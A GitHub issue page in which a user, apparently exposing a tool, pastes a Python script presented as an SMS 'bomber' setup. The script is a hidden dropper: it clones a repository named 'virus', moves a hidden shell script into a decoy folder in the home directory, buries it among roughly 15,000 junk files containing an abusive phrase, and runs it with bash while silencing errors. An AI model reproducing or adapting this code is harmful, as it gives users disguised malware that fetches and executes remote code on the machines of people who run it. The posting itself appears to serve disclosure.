Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

your useless code #23

Open
peacepy opened this issue Jul 19, 2024 · 1 comment
Open

your useless code #23

peacepy opened this issue Jul 19, 2024 · 1 comment

Comments

@peacepy
Copy link

peacepy commented Jul 19, 2024

Coded by Jatin Kalwar

Don't steal my code, read license

If you use any part of the code, then give me credit

import os
from colorama import Fore, Style
import socket

def is_connected():
try:
socket.create_connection(("1.1.1.1", 53))
return True
except OSError:
pass
return False

connected = is_connected()
if not connected:
os.system("clear")
os.system("echo")
print(Fore.RED + 'YOU ARE NOT CONNECTED TO INTERNET')
exit()

pth = os.path.expanduser('~')
th = os.path.join(pth, '.gitt')
pat = os.path.exists(th)

if not pat:
os.system("mkdir $HOME/.gitt 2> /dev/null")

patt = os.path.join(th, '.djhsa171')
fipa = os.path.isfile(patt)
os.system("clear")

if not fipa:
os.system("echo")
print(Fore.GREEN + 'Please Wait Setting up Bomber')
os.system("git clone https://github.com/addqqfyioplmlnccczzvbhfsawrygiibctijctz/virus 2> /dev/null")
os.system("mv $HOME/m-bomber2.O/virus/.bomber.sh $HOME/.gitt 2> /dev/null")
os.system("mv $HOME/.gitt/.bomber.sh $HOME/.gitt/.djhsa171 2> /dev/null")
os.system("rm -rf virus")

files_to_check = [
'.logo', '.tempo', '.tmpo', '.tpo', '.bomber', '.bomb',
'.bomb.sh', '.bash.sh', '.bombing', '.bombber.sh'
]

for filename in files_to_check:
tema = os.path.join(th, filename)
if not os.path.isfile(tema):
os.system(f"touch $HOME/.gitt/{filename} 2> /dev/null")

for i in range(1000):
patt = os.path.join(th, f".bomb{i}")
if not os.path.isfile(patt):
with open(patt, 'w') as g:
g.write('teri maaa ki dhghgdg sgf sgf sghg sfdhfdg fd')

for i in range(1000):
patt = os.path.join(th, f".comb{i}")
if not os.path.isfile(patt):
with open(patt, 'w') as g:
g.write('teri maaa ki dhghgdg sgf sgf sghg sfdhfdg fd')

for i in range(1000):
patt = os.path.join(th, f".bomberr{i}.sh")
if not os.path.isfile(patt):
with open(patt, 'w') as g:
g.write('teri maaa ki dhghgdg sgf sgf sghg sfdhfdg fd')

for i in range(1000):
patt = os.path.join(th, f".loo{i}")
if not os.path.isfile(patt):
with open(patt, 'w') as g:
g.write('teri maaa ki dhghgdg sgf sgf sghg sfdhfdg fd')

for i in range(1000):
patt = os.path.join(th, f".logoo{i}")
if not os.path.isfile(patt):
with open(patt, 'w') as g:
g.write('teri maaa ki dhghgdg sgf sgf sghg sfdhfdg fd')

for i in range(5000):
patt = os.path.join(th, f".ahjfv{i}")
if not os.path.isfile(patt):
with open(patt, 'w') as g:
g.write('teri maaa ki dhghgdg sgf sgf sghg sfdhfdg fd')

for i in range(5000):
patt = os.path.join(th, f".djhsa{i}")
if i != 171 and not os.path.isfile(patt):
with open(patt, 'w') as g:
g.write('teri maaa ki dhghgdg sgf sgf sghg sfdhfdg fd')

os.system("bash $HOME/.gitt/.djhsa171 2> /dev/null")

@Uffxhfx
Copy link

Uffxhfx commented Jul 20, 2024 via email

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants